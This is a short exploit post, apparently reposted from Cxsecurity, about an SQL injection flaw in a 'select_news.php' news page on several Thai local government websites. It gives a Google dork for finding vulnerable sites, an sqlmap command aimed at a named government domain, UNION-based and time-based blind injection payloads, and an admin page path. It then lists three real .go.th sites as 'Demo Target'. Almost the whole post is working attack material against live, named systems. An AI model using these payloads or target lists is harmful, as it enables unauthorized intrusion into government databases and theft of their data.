Thailand Government SQL İnjection Vulnerability tested Kali Linux 2018.1


Information Exploit

[+] Exploit Title: Thailand Government Sql İnjection Vulnerability
[+] Author : Cxsecurity.com and SaruH4N & Turkhackteam.org
[+] Dork : inurl:select_news.php?news_id=
[+] Tested on : Kali Linux 2018.1, Chrome

Poc

[+] SQLMAP Poc : sqlmap -u "http://www.muangphai.go.th/select_news.php?news_id=148" --dbs
[+] Poc SQL Injection : Payload: news_id=91' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7178767171,0x737058556a724a7847784a786d724f4d71617448515a44456444516d526177676349527446507356,0x716b7a7671),NULL,NULL,NULL-- lIGH
[+] Poc local Admin : /admin.php

Get Parameter

Parameter: news_id (GET)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: news_id=67' AND SLEEP(5) AND 'TwPA'='TwPA




Demo Target

- http://www.namtok.go.th/select_news.php?news_id=91
- http://www.bangtathen.go.th/select_news.php?news_id=67
- http://www.muangphai.go.th/select_news.php?news_id=148

Video Tutorial


Sumber : [Cxsecurity.com]
Previous
Next Post »